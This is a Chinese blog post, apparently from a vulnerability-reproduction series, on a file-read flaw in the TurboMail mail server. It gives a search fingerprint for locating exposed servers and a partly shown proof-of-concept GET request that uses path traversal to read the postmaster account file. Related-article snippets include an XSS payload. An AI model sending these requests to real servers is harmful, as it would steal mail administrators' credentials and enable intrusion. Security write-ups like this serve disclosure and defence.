【漏洞复现】TurboMail邮件系统viewfile文件读取漏洞

最新推荐文章于 2024-03-30 08:36:07 发布

晚风不及你ღ

最新推荐文章于 2024-03-30 08:36:07 发布

阅读量789

点赞数 7

文章标签： web安全

本文链接：https://blog.csdn.net/qq_37113223/article/details/135131538

版权

【漏洞复现】专栏收录该内容

150 篇文章 1 订阅

已下架不支持订阅

本文介绍了TurboMail邮件系统的viewfile文件读取漏洞，该漏洞可能导致攻击者获取账户密码并登录后台。通过提供POC，展示了漏洞复现过程，并提出了联系软件厂商进行修复的建议。

摘要由CSDN通过智能技术生成

Nx01 产品简介

TurboMail邮件系统是广州拓波软件科技有限公司研发的面向企事业单位通信需求而研发的电子邮件服务器系统。

Nx02 漏洞描述

广州拓波软件科技有限公司TurboMail邮件系统存在viewfile文件读取漏洞，攻击者可通过此漏洞读取账户密码，从而登录后台进一步利用。

Nx03 产品主页

body="maintlogin.jsp" and body="/mailmain?type=logout"

Nx04 漏洞复现

POC1：

GET /viewfile?type=cardpic&mbid=1&msgid=2&logtype=3&view=true&cardid=/accounts/root/postmaster&cardclass=../&filename=/account.xml HTTP/1.1
Host: {
  {Hostname}}
Accept-Encoding: gzip, deflate
Accept-Langua

了解本专栏

已下架不支持订阅

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

晚风不及你ღ

关注关注

7
点赞
踩
9

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

已下架不支持订阅

TurboMail viewfile 文件读取漏洞（含批量验证poc）

weixin_43567873的博客

04-18

162

TurboMail viewfile 文件读取漏洞（含批量验证poc）

漏洞复现-TurboMail viewfile 文件读取漏洞（附漏洞检测脚本）

jjjj1029056414的博客

12-19

687

漏洞复现-TurboMail viewfile 文件读取漏洞，附带自己写的poc脚本

参与评论您还未登录，请先登录后发表或查看评论

turbomail mysql_TurboMail 前台sql注入漏洞

weixin_42612804的博客

01-19

786

0x1 前台注入turbomail\web\webapps\ROOT\enterprise\noteadd.jsp:...UserInfo userinfo = ms.userinfo;if (userinfo == null) {XInfo.gotoInfo(ms,request,response,"info.loginfail",null,0);return;}String id = requ...

TurboMail邮件系统，完美修复OpenSSL心脏出血漏洞

weixin_33896726的博客

04-23

227

2019独角兽企业重金招聘Python工程师标准>>> ...

TurboGate邮件网关安全防护阻绝机密外泄

weixin_33908217的博客

06-20

148

2019独角兽企业重金招聘Python工程师标准>>> ...

TurboMail防黑客入侵邮件系统骗取货款

weixin_34239169的博客

06-17

170

2019独角兽企业重金招聘Python工程师标准>>> ...

TurboMail邮件系统用户数据批量化管理

weixin_33832340的博客

02-05

234

2019独角兽企业重金招聘Python工程师标准>>> ...

TurboMail邮件系统：企业通信的核心

"TurboMail邮件系统是一款由广州拓波软件科技有限公司自主研发的先进电子邮件服务器系统，专为企事业单位设计，提供智能级的信息沟通平台。该系统以其先进的底层架构、强大的研发实力、安全稳定且易于维护的性能赢得...

2023.3.17 | Goby红队版可利用漏洞更新

m0_46699477的博客

03-17

8919

Nacos 身份认证绕过、泛微OA SQL注入、任意文件读取CVE-2023-26256、任意文件上传CVE-2022-39952、天融信任意文件下载、命令执行漏洞、代码执行CVE-2022-27596、路径穿越CVE-2022-48253、CVE-2023-25717、Aspera 远程代码执行CVE-2022-47986、SolarView Compact 、CVE-2023-23333、未授权访问、CVE-2022-31474、TurboMail文件读取、Apache默认密码....

邮件系统漏洞

最新发布

m0_62207482的博客

03-30

567

作为当今世界上使用最为频繁的商务通信工具—— 邮件系统，更是屡屡遭受漏洞攻击的困扰，这不仅因为制造漏洞的途径多，还以为邮件系统的互联网通信协议本身的问题。前者如程序员因为工作失误出现编码漏洞，毕竟人非机器，在紧张复杂的工作过程中，难免有个闪失，除了人为因素，还有软件编码工具及编译器造成的错误，不同应用程序彼此之间的相互作用，如大多数程序必须与其它API相交互，保存并检索文件，同时运行在多种不同类型的设备上，都会可能产生漏洞；后者如互联网通信协议—TCP和UDP，其开放性常常引来黑客的攻击；

【代码审计】敏感信息泄露

TeamsSix 的 CSDN 空间

12-15

3051

这里以 TurboMail 5.2.0 里的敏感信息泄露漏洞作为学习。已知 TurboMail 5.2.0 的敏感信息泄露路径为 /mailmain?type=pm 打开 TurboMail 的安装目录，在 turbomail\web\webapps\ROOT\WEB-INF 下找到 web.xml 文件，发现以下配置信息 <servlet-mapping> <servlet-name>mailmaini</servlet-name> <url-patte

亿邮电子邮件系统远程命令执行漏洞漏洞复现

Boom！脑洞大爆炸的博客

11-11

3627

亿邮电子邮件系统远程命令执行漏洞漏洞复现

老板邮局android版本,BossMail邮局

weixin_42548893的博客

05-26

780

作为国内知名的企业邮箱服务商，老板邮局(www.laobanmail.com)以企业邮箱为载体打入了企业通讯市场，融合多种协同办公功能，逐渐形成了一个多终端完整的企业统一通讯平台。PC端：网页直接收发用户在电脑浏览器中输入“mail.企业域名”(如mail.zzy.cn)直接跳转登录界面，输入账号密码即可直接登录而不再需要专门下载邮箱客户端，PC端：老板邮局企业邮箱与BQ企业即时通绑定两者绑定之后...

Coremail邮件系统存在配置信息泄露漏洞（CNVD-2019-16798）

墨痕诉清风的博客

11-09

7826

目前，论客公司已发布补丁进行修复，针对Coremail XT5和Coremail XT3/CM5版本，补丁编号为CMXT5-2019-0002，程序版本1.1.0-alphabuild20190524（3813d273）。综合CNVD技术支撑单位报送、白帽子报送、CNVD秘书处主动探测的结果显示，我国境内共有1484台服务器受此漏洞影响，影响比例约为4.0%。邮件系统的mailsms模块的参数大小写敏感存在缺陷，使得攻击者利用该漏洞，在未授权的情况下，通过远程访问URL地址获知。...

邮件系统最常见的几个安全问题

weixin_34095889的博客

04-29

2768

【漏洞学习——XSS】TOM邮箱存储型XSS一枚

Fly_鹏程万里

02-22

501

漏洞细节首先在个人签名的标题和内容处输入"><img src="#" onerror=alert('22222222222')> 点击保存写一封信一直都是服务繁忙，发送不出去于是对签名内容进行base64加密打开收到的邮件，成功触发弹cookie 修复建议加强过滤...

完全揭秘***利用漏洞***电子邮件系统

weixin_33915554的博客

12-17

194

在不断公布的漏洞通报中，邮件系统的漏洞该算最普遍的一项。***常常利用电子邮件系统的漏洞，结合简单的工具就能达到***目的。电子邮件究竟有哪些潜在的风险?***在邮件上到底都做了哪些手脚?一同走进***的全程***，了解电子邮件正在面临的威胁和挑战……毫无疑问，电子邮件是当今世界上使用最频繁的商务通信工具，如今，***和病毒撰写者不断开发新的和有创造性的方法，以期战胜安全系统...